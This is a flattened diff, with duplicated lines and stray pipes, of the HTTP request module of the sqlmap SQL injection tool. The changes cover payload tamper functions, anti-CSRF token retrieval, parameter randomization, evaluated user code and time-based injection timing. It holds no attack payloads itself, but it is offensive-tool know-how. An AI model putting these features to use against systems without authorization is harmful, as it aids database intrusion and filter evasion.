requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items())
|
||||||
|
|
||||||
if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj:
|
if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj:
|
||||||
conf.cj._policy._now = conf.cj._now = int(time.time())
|
conf.cj._policy._now = conf.cj._now = int(time.time())
|
||||||
cookies = conf.cj._cookies_for_request(req)
|
cookies = conf.cj._cookies_for_request(req)
|
||||||
requestHeaders += "\n%s" % ("Cookie: %s" % ";".join("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies))
|
requestHeaders += "\n%s" % ("Cookie: %s" % ";".join("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies))
|
||||||
|
|
||||||
if post is not None:
|
if post is not None:
|
||||||
if not getRequestHeader(req, HTTP_HEADER.CONTENT_LENGTH):
|
if not getRequestHeader(req, HTTP_HEADER.CONTENT_LENGTH):
|
||||||
requestHeaders += "\n%s: %d" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post))
|
requestHeaders += "\n%s: %d" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post))
|
||||||
|
|
||||||
if not getRequestHeader(req, HTTP_HEADER.CONNECTION):
|
if not getRequestHeader(req, HTTP_HEADER.CONNECTION):
|
||||||
requestHeaders += "\n%s: close" % HTTP_HEADER.CONNECTION
|
requestHeaders += "\n%s: close" % HTTP_HEADER.CONNECTION
|
||||||
|
|
||||||
requestMsg += "\n%s" % requestHeaders
|
requestMsg += "\n%s" % requestHeaders
|
||||||
|
|
||||||
if post is not None:
|
if post is not None:
|
||||||
requestMsg += "\n\n%s" % getUnicode(post)
|
requestMsg += "\n\n%s" % getUnicode(post)
|
||||||
|
|
||||||
requestMsg += "\n"
|
requestMsg += "\n"
|
||||||
|
|
||||||
threadData.lastRequestMsg = requestMsg
|
threadData.lastRequestMsg = requestMsg
|
||||||
|
|
||||||
logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)
|
logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)
|
||||||
|
|
||||||
conn = urllib2.urlopen(req)
|
conn = urllib2.urlopen(req)
|
||||||
|
|
||||||
if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and conf.aType == AUTH_TYPE.BASIC:
|
if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and (conf.authType or "").lower() == AUTH_TYPE.BASIC.lower():
|
||||||
kb.authHeader = getRequestHeader(req, HTTP_HEADER.AUTHORIZATION)
|
kb.authHeader = getRequestHeader(req, HTTP_HEADER.AUTHORIZATION)
|
||||||
|
|
||||||
if not kb.proxyAuthHeader and getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION):
|
if not kb.proxyAuthHeader and getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION):
|
||||||
kb.proxyAuthHeader = getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION)
|
kb.proxyAuthHeader = getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION)
|
||||||
|
|
||||||
# Return response object
|
# Return response object
|
||||||
if response:
|
if response:
|
||||||
return conn, None, None
|
return conn, None, None
|
||||||
|
|
||||||
# Get HTTP response
|
# Get HTTP response
|
||||||
if hasattr(conn, 'redurl'):
|
if hasattr(conn, 'redurl'):
|
||||||
page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\
|
page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\
|
||||||
else Connect._connReadProxy(conn)) if not skipRead else None
|
else Connect._connReadProxy(conn)) if not skipRead else None
|
||||||
skipLogTraffic = kb.redirectChoice == REDIRECTION.NO
|
skipLogTraffic = kb.redirectChoice == REDIRECTION.NO
|
||||||
code = conn.redcode
|
code = conn.redcode
|
||||||
else:
|
else:
|
||||||
page = Connect._connReadProxy(conn) if not skipRead else None
|
page = Connect._connReadProxy(conn) if not skipRead else None
|
||||||
|
|
||||||
code = code or conn.code
|
code = code or conn.code
|
||||||
responseHeaders = conn.info()
|
responseHeaders = conn.info()
|
||||||
responseHeaders[URI_HTTP_HEADER] = conn.geturl()
|
responseHeaders[URI_HTTP_HEADER] = conn.geturl()
|
||||||
page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE))
|
page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE))
|
||||||
status = getUnicode(conn.msg)
|
status = getUnicode(conn.msg)
|
||||||
|
|
||||||
if extractRegexResult(META_REFRESH_REGEX, page) and not refreshing:
|
if extractRegexResult(META_REFRESH_REGEX, page) and not refreshing:
|
||||||
url = extractRegexResult(META_REFRESH_REGEX, page)
|
url = extractRegexResult(META_REFRESH_REGEX, page)
|
||||||
|
@ -428,13 +490,13 @@ class Connect(object):
|
||||||
pass
|
pass
|
||||||
|
|
||||||
# Explicit closing of connection object
|
# Explicit closing of connection object
|
||||||
if not conf.keepAlive:
|
if conn and not conf.keepAlive:
|
||||||
try:
|
try:
|
||||||
if hasattr(conn.fp, '_sock'):
|
if hasattr(conn.fp, '_sock'):
|
||||||
conn.fp._sock.close()
|
conn.fp._sock.close()
|
||||||
conn.close()
|
conn.close()
|
||||||
except Exception, msg:
|
except Exception, msg:
|
||||||
warnMsg = "problem occured during connection closing ('%s')" % msg
|
warnMsg = "problem occurred during connection closing ('%s')" % msg
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
except urllib2.HTTPError, e:
|
except urllib2.HTTPError, e:
|
||||||
|
@ -459,8 +521,9 @@ class Connect(object):
|
||||||
page = page if isinstance(page, unicode) else getUnicode(page)
|
page = page if isinstance(page, unicode) else getUnicode(page)
|
||||||
|
|
||||||
code = e.code
|
code = e.code
|
||||||
threadData.lastHTTPError = (threadData.lastRequestUID, code)
|
|
||||||
|
|
||||||
|
kb.originalCode = kb.originalCode or code
|
||||||
|
threadData.lastHTTPError = (threadData.lastRequestUID, code)
|
||||||
kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1
|
kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1
|
||||||
|
|
||||||
status = getUnicode(e.msg)
|
status = getUnicode(e.msg)
|
||||||
|
@ -480,7 +543,7 @@ class Connect(object):
|
||||||
|
|
||||||
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)
|
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)
|
||||||
|
|
||||||
if e.code == httplib.UNAUTHORIZED:
|
if e.code == httplib.UNAUTHORIZED and not conf.ignore401:
|
||||||
errMsg = "not authorized, try to provide right HTTP "
|
errMsg = "not authorized, try to provide right HTTP "
|
||||||
errMsg += "authentication type and valid credentials (%d)" % code
|
errMsg += "authentication type and valid credentials (%d)" % code
|
||||||
raise SqlmapConnectionException(errMsg)
|
raise SqlmapConnectionException(errMsg)
|
||||||
|
@ -510,25 +573,35 @@ class Connect(object):
|
||||||
debugMsg = "got HTTP error code: %d (%s)" % (code, status)
|
debugMsg = "got HTTP error code: %d (%s)" % (code, status)
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine, httplib.IncompleteRead, ProxyError, SqlmapCompressionException), e:
|
except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine, httplib.IncompleteRead, httplib.ResponseNotReady, struct.error, ProxyError, SqlmapCompressionException, WebSocketException), e:
|
||||||
tbMsg = traceback.format_exc()
|
tbMsg = traceback.format_exc()
|
||||||
|
|
||||||
if "no host given" in tbMsg:
|
if "no host given" in tbMsg:
|
||||||
warnMsg = "invalid URL address used (%s)" % repr(url)
|
warnMsg = "invalid URL address used (%s)" % repr(url)
|
||||||
raise SqlmapSyntaxException(warnMsg)
|
raise SqlmapSyntaxException(warnMsg)
|
||||||
elif "forcibly closed" in tbMsg:
|
elif "forcibly closed" in tbMsg or "Connection is already closed" in tbMsg:
|
||||||
warnMsg = "connection was forcibly closed by the target URL"
|
warnMsg = "connection was forcibly closed by the target URL"
|
||||||
elif "timed out" in tbMsg:
|
elif "timed out" in tbMsg:
|
||||||
|
if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
|
||||||
|
singleTimeWarnMessage("there is a possibility that the target (or WAF) is dropping 'suspicious' requests")
|
||||||
warnMsg = "connection timed out to the target URL"
|
warnMsg = "connection timed out to the target URL"
|
||||||
elif "URLError" in tbMsg or "error" in tbMsg:
|
elif "URLError" in tbMsg or "error" in tbMsg:
|
||||||
warnMsg = "unable to connect to the target URL"
|
warnMsg = "unable to connect to the target URL"
|
||||||
|
elif "NTLM" in tbMsg:
|
||||||
|
warnMsg = "there has been a problem with NTLM authentication"
|
||||||
elif "BadStatusLine" in tbMsg:
|
elif "BadStatusLine" in tbMsg:
|
||||||
warnMsg = "connection dropped or unknown HTTP "
|
warnMsg = "connection dropped or unknown HTTP "
|
||||||
warnMsg += "status code received. Try to force the HTTP User-Agent "
|
warnMsg += "status code received"
|
||||||
warnMsg += "header with option '--user-agent' or switch '--random-agent'"
|
if not conf.agent and not conf.randomAgent:
|
||||||
|
warnMsg += ". Try to force the HTTP User-Agent "
|
||||||
|
warnMsg += "header with option '--user-agent' or switch '--random-agent'"
|
||||||
elif "IncompleteRead" in tbMsg:
|
elif "IncompleteRead" in tbMsg:
|
||||||
warnMsg = "there was an incomplete read error while retrieving data "
|
warnMsg = "there was an incomplete read error while retrieving data "
|
||||||
warnMsg += "from the target URL"
|
warnMsg += "from the target URL"
|
||||||
|
elif "Handshake status" in tbMsg:
|
||||||
|
status = re.search("Handshake status ([\d]{3})", tbMsg)
|
||||||
|
errMsg = "websocket handshake status %s" % status.group(1) if status else "unknown"
|
||||||
|
raise SqlmapConnectionException(errMsg)
|
||||||
else:
|
else:
|
||||||
warnMsg = "unable to connect to the target URL"
|
warnMsg = "unable to connect to the target URL"
|
||||||
|
|
||||||
|
@ -553,7 +626,11 @@ class Connect(object):
|
||||||
raise SqlmapConnectionException(warnMsg)
|
raise SqlmapConnectionException(warnMsg)
|
||||||
|
|
||||||
finally:
|
finally:
|
||||||
page = page if isinstance(page, unicode) else getUnicode(page)
|
if not isinstance(page, unicode):
|
||||||
|
if HTTP_HEADER.CONTENT_TYPE in (responseHeaders or {}) and not re.search(TEXT_CONTENT_TYPE_REGEX, responseHeaders[HTTP_HEADER.CONTENT_TYPE]):
|
||||||
|
page = unicode(page, errors="ignore")
|
||||||
|
else:
|
||||||
|
page = getUnicode(page)
|
||||||
socket.setdefaulttimeout(conf.timeout)
|
socket.setdefaulttimeout(conf.timeout)
|
||||||
|
|
||||||
processResponse(page, responseHeaders)
|
processResponse(page, responseHeaders)
|
||||||
|
@ -561,7 +638,13 @@ class Connect(object):
|
||||||
if conn and getattr(conn, "redurl", None):
|
if conn and getattr(conn, "redurl", None):
|
||||||
_ = urlparse.urlsplit(conn.redurl)
|
_ = urlparse.urlsplit(conn.redurl)
|
||||||
_ = ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else ""))
|
_ = ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else ""))
|
||||||
requestMsg = re.sub("(\n[A-Z]+ ).+?( HTTP/\d)", "\g<1>%s\g<2>" % getUnicode(_), requestMsg, 1)
|
requestMsg = re.sub("(\n[A-Z]+ ).+?( HTTP/\d)", "\g<1>%s\g<2>" % re.escape(getUnicode(_)), requestMsg, 1)
|
||||||
|
|
||||||
|
if kb.resendPostOnRedirect is False:
|
||||||
|
requestMsg = re.sub("(\[#\d+\]:\n)POST ", "\g<1>GET ", requestMsg)
|
||||||
|
requestMsg = re.sub("(?i)Content-length: \d+\n", "", requestMsg)
|
||||||
|
requestMsg = re.sub("(?s)\n\n.+", "\n", requestMsg)
|
||||||
|
|
||||||
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, conn.code, status)
|
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, conn.code, status)
|
||||||
else:
|
else:
|
||||||
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)
|
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)
|
||||||
|
@ -602,24 +685,26 @@ class Connect(object):
|
||||||
pageLength = None
|
pageLength = None
|
||||||
uri = None
|
uri = None
|
||||||
code = None
|
code = None
|
||||||
urlEncodePost = None
|
|
||||||
|
|
||||||
if not place:
|
if not place:
|
||||||
place = kb.injection.place or PLACE.GET
|
place = kb.injection.place or PLACE.GET
|
||||||
|
|
||||||
|
if not auxHeaders:
|
||||||
|
auxHeaders = {}
|
||||||
|
|
||||||
raise404 = place != PLACE.URI if raise404 is None else raise404
|
raise404 = place != PLACE.URI if raise404 is None else raise404
|
||||||
|
method = method or conf.method
|
||||||
|
|
||||||
value = agent.adjustLateValues(value)
|
value = agent.adjustLateValues(value)
|
||||||
payload = agent.extractPayload(value)
|
payload = agent.extractPayload(value)
|
||||||
threadData = getCurrentThreadData()
|
threadData = getCurrentThreadData()
|
||||||
|
|
||||||
if conf.httpHeaders:
|
if conf.httpHeaders:
|
||||||
headers = dict(conf.httpHeaders)
|
headers = OrderedDict(conf.httpHeaders)
|
||||||
contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys())
|
contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys())
|
||||||
urlEncodePost = contentType and "urlencoded" in contentType or contentType is None
|
|
||||||
|
|
||||||
if (kb.postHint or conf.skipUrlEncode) and urlEncodePost:
|
if (kb.postHint or conf.skipUrlEncode) and kb.postUrlEncode:
|
||||||
urlEncodePost = False
|
kb.postUrlEncode = False
|
||||||
conf.httpHeaders = [_ for _ in conf.httpHeaders if _[1] != contentType]
|
conf.httpHeaders = [_ for _ in conf.httpHeaders if _[1] != contentType]
|
||||||
contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, PLAIN_TEXT_CONTENT_TYPE)
|
contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, PLAIN_TEXT_CONTENT_TYPE)
|
||||||
conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType))
|
conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType))
|
||||||
|
@ -627,7 +712,13 @@ class Connect(object):
|
||||||
if payload:
|
if payload:
|
||||||
if kb.tamperFunctions:
|
if kb.tamperFunctions:
|
||||||
for function in kb.tamperFunctions:
|
for function in kb.tamperFunctions:
|
||||||
payload = function(payload=payload, headers=auxHeaders)
|
try:
|
||||||
|
payload = function(payload=payload, headers=auxHeaders)
|
||||||
|
except Exception, ex:
|
||||||
|
errMsg = "error occurred while running tamper "
|
||||||
|
errMsg += "function '%s' ('%s')" % (function.func_name, ex)
|
||||||
|
raise SqlmapGenericException(errMsg)
|
||||||
|
|
||||||
if not isinstance(payload, basestring):
|
if not isinstance(payload, basestring):
|
||||||
errMsg = "tamper function '%s' returns " % function.func_name
|
errMsg = "tamper function '%s' returns " % function.func_name
|
||||||
errMsg += "invalid payload type ('%s')" % type(payload)
|
errMsg += "invalid payload type ('%s')" % type(payload)
|
||||||
|
@ -637,7 +728,7 @@ class Connect(object):
|
||||||
|
|
||||||
logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload))
|
logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload))
|
||||||
|
|
||||||
if place == PLACE.CUSTOM_POST:
|
if place == PLACE.CUSTOM_POST and kb.postHint:
|
||||||
if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
|
if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
|
||||||
# payloads in SOAP/XML should have chars > and < replaced
|
# payloads in SOAP/XML should have chars > and < replaced
|
||||||
# with their HTML encoded counterparts
|
# with their HTML encoded counterparts
|
||||||
|
@ -647,11 +738,18 @@ class Connect(object):
|
||||||
payload = json.dumps(payload[1:-1])
|
payload = json.dumps(payload[1:-1])
|
||||||
else:
|
else:
|
||||||
payload = json.dumps(payload)[1:-1]
|
payload = json.dumps(payload)[1:-1]
|
||||||
|
elif kb.postHint == POST_HINT.JSON_LIKE:
|
||||||
|
payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
|
||||||
|
if payload.startswith('"') and payload.endswith('"'):
|
||||||
|
payload = json.dumps(payload[1:-1])
|
||||||
|
else:
|
||||||
|
payload = json.dumps(payload)[1:-1]
|
||||||
|
payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
|
||||||
value = agent.replacePayload(value, payload)
|
value = agent.replacePayload(value, payload)
|
||||||
else:
|
else:
|
||||||
# GET, POST, URI and Cookie payload needs to be throughly URL encoded
|
# GET, POST, URI and Cookie payload needs to be thoroughly URL encoded
|
||||||
if place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST,) and urlEncodePost:
|
if place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode:
|
||||||
payload = urlencode(payload, '%', False, place != PLACE.URI)
|
payload = urlencode(payload, '%', False, place != PLACE.URI) # spaceplus is handled down below
|
||||||
value = agent.replacePayload(value, payload)
|
value = agent.replacePayload(value, payload)
|
||||||
|
|
||||||
if conf.hpp:
|
if conf.hpp:
|
||||||
|
@ -715,56 +813,160 @@ class Connect(object):
|
||||||
uri = conf.url
|
uri = conf.url
|
||||||
|
|
||||||
if value and place == PLACE.CUSTOM_HEADER:
|
if value and place == PLACE.CUSTOM_HEADER:
|
||||||
if not auxHeaders:
|
|
||||||
auxHeaders = {}
|
|
||||||
auxHeaders[value.split(',')[0]] = value.split(',', 1)[1]
|
auxHeaders[value.split(',')[0]] = value.split(',', 1)[1]
|
||||||
|
|
||||||
|
if conf.csrfToken:
|
||||||
|
def _adjustParameter(paramString, parameter, newValue):
|
||||||
|
retVal = paramString
|
||||||
|
match = re.search("%s=(?P<value>[^&]*)" % re.escape(parameter), paramString)
|
||||||
|
if match:
|
||||||
|
origValue = match.group("value")
|
||||||
|
retVal = re.sub("%s=[^&]*" % re.escape(parameter), "%s=%s" % (parameter, newValue), paramString)
|
||||||
|
return retVal
|
||||||
|
|
||||||
|
page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
|
||||||
|
match = re.search(r"<input[^>]+name=[\"']?%s[\"']?\s[^>]*value=(\"([^\"]+)|'([^']+)|([^ >]+))" % re.escape(conf.csrfToken), page or "")
|
||||||
|
token = (match.group(2) or match.group(3) or match.group(4)) if match else None
|
||||||
|
|
||||||
|
if not token:
|
||||||
|
if conf.csrfUrl != conf.url and code == httplib.OK:
|
||||||
|
if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""):
|
||||||
|
token = page
|
||||||
|
|
||||||
|
if not token and any(_.name == conf.csrfToken for _ in conf.cj):
|
||||||
|
for _ in conf.cj:
|
||||||
|
if _.name == conf.csrfToken:
|
||||||
|
token = _.value
|
||||||
|
if not any (conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))):
|
||||||
|
if post:
|
||||||
|
post = "%s%s%s=%s" % (post, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token)
|
||||||
|
elif get:
|
||||||
|
get = "%s%s%s=%s" % (get, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token)
|
||||||
|
else:
|
||||||
|
get = "%s=%s" % (conf.csrfToken, token)
|
||||||
|
break
|
||||||
|
|
||||||
|
if not token:
|
||||||
|
errMsg = "anti-CSRF token '%s' can't be found at '%s'" % (conf.csrfToken, conf.csrfUrl or conf.url)
|
||||||
|
if not conf.csrfUrl:
|
||||||
|
errMsg += ". You can try to rerun by providing "
|
||||||
|
errMsg += "a valid value for option '--csrf-url'"
|
||||||
|
raise SqlmapTokenException, errMsg
|
||||||
|
|
||||||
|
if token:
|
||||||
|
for place in (PLACE.GET, PLACE.POST):
|
||||||
|
if place in conf.parameters:
|
||||||
|
if place == PLACE.GET and get:
|
||||||
|
get = _adjustParameter(get, conf.csrfToken, token)
|
||||||
|
elif place == PLACE.POST and post:
|
||||||
|
post = _adjustParameter(post, conf.csrfToken, token)
|
||||||
|
|
||||||
|
for i in xrange(len(conf.httpHeaders)):
|
||||||
|
if conf.httpHeaders[i][0].lower() == conf.csrfToken.lower():
|
||||||
|
conf.httpHeaders[i] = (conf.httpHeaders[i][0], token)
|
||||||
|
|
||||||
if conf.rParam:
|
if conf.rParam:
|
||||||
def _randomizeParameter(paramString, randomParameter):
|
def _randomizeParameter(paramString, randomParameter):
|
||||||
retVal = paramString
|
retVal = paramString
|
||||||
match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString)
|
match = re.search(r"(\A|\b)%s=(?P<value>[^&;]+)" % re.escape(randomParameter), paramString)
|
||||||
if match:
|
if match:
|
||||||
origValue = match.group("value")
|
origValue = match.group("value")
|
||||||
retVal = re.sub("%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString)
|
retVal = re.sub(r"(\A|\b)%s=[^&;]+" % re.escape(randomParameter), "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString)
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
for randomParameter in conf.rParam:
|
for randomParameter in conf.rParam:
|
||||||
for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE):
|
for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE, PLACE.URI, PLACE.CUSTOM_POST):
|
||||||
if item in conf.parameters:
|
if item in conf.parameters:
|
||||||
if item == PLACE.GET and get:
|
if item == PLACE.GET and get:
|
||||||
get = _randomizeParameter(get, randomParameter)
|
get = _randomizeParameter(get, randomParameter)
|
||||||
elif item == PLACE.POST and post:
|
elif item in (PLACE.POST, PLACE.CUSTOM_POST) and post:
|
||||||
post = _randomizeParameter(post, randomParameter)
|
post = _randomizeParameter(post, randomParameter)
|
||||||
elif item == PLACE.COOKIE and cookie:
|
elif item == PLACE.COOKIE and cookie:
|
||||||
cookie = _randomizeParameter(cookie, randomParameter)
|
cookie = _randomizeParameter(cookie, randomParameter)
|
||||||
|
elif item == PLACE.URI and uri:
|
||||||
|
uri = _randomizeParameter(uri, randomParameter)
|
||||||
|
|
||||||
if conf.evalCode:
|
if conf.evalCode:
|
||||||
delimiter = conf.pDel or DEFAULT_GET_POST_DELIMITER
|
delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER
|
||||||
variables = {}
|
variables = {"uri": uri}
|
||||||
originals = {}
|
originals = {}
|
||||||
|
keywords = keyword.kwlist
|
||||||
|
|
||||||
for item in filter(None, (get, post)):
|
for item in filter(None, (get, post if not kb.postHint else None)):
|
||||||
for part in item.split(delimiter):
|
for part in item.split(delimiter):
|
||||||
if '=' in part:
|
if '=' in part:
|
||||||
name, value = part.split('=', 1)
|
name, value = part.split('=', 1)
|
||||||
|
name = re.sub(r"[^\w]", "", name.strip())
|
||||||
|
if name in keywords:
|
||||||
|
name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
|
||||||
value = urldecode(value, convall=True, plusspace=(item==post and kb.postSpaceToPlus))
|
value = urldecode(value, convall=True, plusspace=(item==post and kb.postSpaceToPlus))
|
||||||
evaluateCode("%s=%s" % (name, repr(value)), variables)
|
variables[name] = value
|
||||||
|
|
||||||
|
if cookie:
|
||||||
|
for part in cookie.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER):
|
||||||
|
if '=' in part:
|
||||||
|
name, value = part.split('=', 1)
|
||||||
|
name = re.sub(r"[^\w]", "", name.strip())
|
||||||
|
if name in keywords:
|
||||||
|
name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
|
||||||
|
value = urldecode(value, convall=True)
|
||||||
|
variables[name] = value
|
||||||
|
|
||||||
|
while True:
|
||||||
|
try:
|
||||||
|
compiler.parse(conf.evalCode.replace(';', '\n'))
|
||||||
|
except SyntaxError, ex:
|
||||||
|
original = replacement = ex.text.strip()
|
||||||
|
for _ in re.findall(r"[A-Za-z_]+", original)[::-1]:
|
||||||
|
if _ in keywords:
|
||||||
|
replacement = replacement.replace(_, "%s%s" % (_, EVALCODE_KEYWORD_SUFFIX))
|
||||||
|
break
|
||||||
|
if original == replacement:
|
||||||
|
conf.evalCode = conf.evalCode.replace(EVALCODE_KEYWORD_SUFFIX, "")
|
||||||
|
break
|
||||||
|
else:
|
||||||
|
conf.evalCode = conf.evalCode.replace(ex.text.strip(), replacement)
|
||||||
|
else:
|
||||||
|
break
|
||||||
|
|
||||||
originals.update(variables)
|
originals.update(variables)
|
||||||
evaluateCode(conf.evalCode, variables)
|
evaluateCode(conf.evalCode, variables)
|
||||||
|
|
||||||
|
for variable in variables.keys():
|
||||||
|
if variable.endswith(EVALCODE_KEYWORD_SUFFIX):
|
||||||
|
value = variables[variable]
|
||||||
|
del variables[variable]
|
||||||
|
variables[variable.replace(EVALCODE_KEYWORD_SUFFIX, "")] = value
|
||||||
|
|
||||||
|
uri = variables["uri"]
|
||||||
|
|
||||||
for name, value in variables.items():
|
for name, value in variables.items():
|
||||||
if name != "__builtins__" and originals.get(name, "") != value:
|
if name != "__builtins__" and originals.get(name, "") != value:
|
||||||
if isinstance(value, (basestring, int)):
|
if isinstance(value, (basestring, int)):
|
||||||
|
found = False
|
||||||
value = unicode(value)
|
value = unicode(value)
|
||||||
if '%s=' % name in (get or ""):
|
|
||||||
get = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, get)
|
regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter))
|
||||||
elif '%s=' % name in (post or ""):
|
if re.search(regex, (get or "")):
|
||||||
post = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, post)
|
found = True
|
||||||
elif post is not None:
|
get = re.sub(regex, "\g<1>%s\g<3>" % value, get)
|
||||||
post += "%s%s=%s" % (delimiter, name, value)
|
|
||||||
else:
|
if re.search(regex, (post or "")):
|
||||||
get += "%s%s=%s" % (delimiter, name, value)
|
found = True
|
||||||
|
post = re.sub(regex, "\g<1>%s\g<3>" % value, post)
|
||||||
|
|
||||||
|
regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), name, re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER))
|
||||||
|
if re.search(regex, (cookie or "")):
|
||||||
|
found = True
|
||||||
|
cookie = re.sub(regex, "\g<1>%s\g<3>" % value, cookie)
|
||||||
|
|
||||||
|
if not found:
|
||||||
|
if post is not None:
|
||||||
|
post += "%s%s=%s" % (delimiter, name, value)
|
||||||
|
elif get is not None:
|
||||||
|
get += "%s%s=%s" % (delimiter, name, value)
|
||||||
|
elif cookie is not None:
|
||||||
|
cookie += "%s%s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, name, value)
|
||||||
|
|
||||||
if not conf.skipUrlEncode:
|
if not conf.skipUrlEncode:
|
||||||
get = urlencode(get, limit=True)
|
get = urlencode(get, limit=True)
|
||||||
|
@ -772,7 +974,7 @@ class Connect(object):
|
||||||
if post is not None:
|
if post is not None:
|
||||||
if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE):
|
if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE):
|
||||||
post = getattr(post, UNENCODED_ORIGINAL_VALUE)
|
post = getattr(post, UNENCODED_ORIGINAL_VALUE)
|
||||||
elif urlEncodePost:
|
elif kb.postUrlEncode:
|
||||||
post = urlencode(post, spaceplus=kb.postSpaceToPlus)
|
post = urlencode(post, spaceplus=kb.postSpaceToPlus)
|
||||||
|
|
||||||
if timeBasedCompare:
|
if timeBasedCompare:
|
||||||
|
@ -784,16 +986,20 @@ class Connect(object):
|
||||||
warnMsg += "time-based injections because of its high latency time"
|
warnMsg += "time-based injections because of its high latency time"
|
||||||
singleTimeWarnMessage(warnMsg)
|
singleTimeWarnMessage(warnMsg)
|
||||||
|
|
||||||
warnMsg = "time-based comparison needs larger statistical "
|
warnMsg = "[%s] [WARNING] time-based comparison requires " % time.strftime("%X")
|
||||||
warnMsg += "model. Making a few dummy requests, please wait.."
|
warnMsg += "larger statistical model, please wait"
|
||||||
singleTimeWarnMessage(warnMsg)
|
dataToStdout(warnMsg)
|
||||||
|
|
||||||
while len(kb.responseTimes) < MIN_TIME_RESPONSES:
|
while len(kb.responseTimes) < MIN_TIME_RESPONSES:
|
||||||
Connect.queryPage(content=True)
|
Connect.queryPage(content=True)
|
||||||
|
dataToStdout('.')
|
||||||
|
|
||||||
|
dataToStdout("\n")
|
||||||
|
